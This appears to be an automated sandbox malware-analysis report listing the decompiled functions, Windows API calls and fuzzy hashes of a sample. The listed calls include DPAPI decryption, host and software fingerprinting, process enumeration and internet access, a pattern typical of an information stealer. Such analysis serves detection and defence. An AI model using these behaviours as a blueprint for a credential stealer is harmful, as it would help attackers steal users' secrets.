Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90

Uniqueness

Uniqueness Score: -1.00%

Function 00414300 Relevance: 7.5, APIs: 5, Instructions: 38registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
HeapAlloc.KERNEL32(00000000), ref: 0041431B
RegOpenKeyExA.KERNEL32(80000002,04332418,00000000,00020119,00000000), ref: 0041433B
RegQueryValueExA.KERNEL32(00000000,04336798,00000000,00000000,000000FF,000000FF), ref: 0041435C
RegCloseKey.ADVAPI32(00000000), ref: 00414366

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00409970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(04330570,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
LoadLibraryA.KERNEL32(043373D0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

SetEnvironmentVariableA.KERNEL32(04330570,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
Opcode Fuzzy Hash: 5e87bb327afe644bc77b25f1e22387be2ab2af628167e3175e717012408de276
Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54

Uniqueness

Uniqueness Score: -1.00%

Function 004065D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F

Strings

@:h@, xrefs: 00406670, 00406673
:h@, xrefs: 0040660D, 00406629, 00406678, 00406688, 004065F4, 00406618, 00406623
:h@, xrefs: 004065DD, 004065FD, 0040667F

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: :h@$:h@$@:h@
API String ID: 544645111-3492212131
Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEC0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,043378D8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
lstrlen.KERNEL32(00000000), ref: 0040D0DF
lstrlen.KERNEL32(00000000), ref: 0040D0F3
DeleteFileA.KERNEL32(00000000), ref: 0040D16C

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
Opcode Fuzzy Hash: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040FD10 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,04332418,00000000,00020119,00000000), ref: 0041433B
Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04336798,00000000,00000000,000000FF,000000FF), ref: 0041435C
Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366

Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04337590,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04330810), ref: 0041438F
Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04337590,00000000,?,0041D74C,00000000,?,00000000,00000000,?,04330810), ref: 00414396

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,043306D0,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0

Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 004144C0
Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA

Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,043365E8,00000000,?,0041D758,00000000,?,00000000,00000000,?,043375F0,00000000), ref: 00414542

Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF

Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A

GetCurrentProcessId.KERNEL32(00000000,?,04337350,00000000,?,0041D76C,00000000,?,00000000,00000000,?,043367F8,00000000,?,0041D768,00000000), ref: 0041037E

Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF

Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04332990,00000000,00020119,00000000), ref: 0041477B
Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04337410,00000000,00000000,000000FF,000000FF), ref: 0041479C
Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6

Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855

Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3

Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04336810,00000000,?,0041D774,00000000,?,00000000,00000000,?,043368D0), ref: 0041496D
Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9

Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04332E78,00000000,00020019,00000000,0041D289), ref: 00414B41

Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04330750), ref: 00404ED9

Strings

E.A, xrefs: 00410981, 004109AC, 00410984

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
String ID: E.A
API String ID: 1035121393-2211245587
Opcode ID: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
Opcode Fuzzy Hash: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00411350 Relevance: 6.1, APIs: 4, Instructions: 100stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411378

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

strtok_s.MSVCRT ref: 0041146F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0432E458,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpystrtok_s$lstrlen
String ID:
API String ID: 3184129880-0
Opcode ID: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
Opcode Fuzzy Hash: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004096C0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,043363A8), ref: 0040971B

Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

memcmp.MSVCRT ref: 00409774

Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF

Strings

, xrefs: 004097A3
DPAPI, xrefs: 0040976B

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 2647593125-1819349886
Opcode ID: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
Opcode Fuzzy Hash: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414DE0 Relevance: 6.1, APIs: 4, Instructions: 60processCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
Process32Next.KERNEL32(00000000,00000128), ref: 00414E30

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
Opcode Fuzzy Hash: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004159E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
CloseHandle.KERNEL32(000000FF), ref: 00415A27

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44

Uniqueness

Uniqueness Score: -1.00%

Function 004137B3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,0432E458,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2968269740.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u3bs.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction ID: 00ad45554361a1bf9ffb836df5d455c5d00fe00f471bf70531fad30136aebd8c
Opcode Fuzzy Hash: b72d18ed1bdfc85c434ab68d1be83dc3fedaf905ff30e20f0e2c3bf58e55dee1
Instruction Fuzzy Hash: 5FF054B0944206AAE720AFA1DD05BFE7675BB08B46F10851AF612951C0DBB856818A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406730 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

Pi@, xrefs: 0040684E, 004067C2, 00406884, 0040679E, 0040689F

Memory Dump Source

Source File: 00000001.00000002.2968269740.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

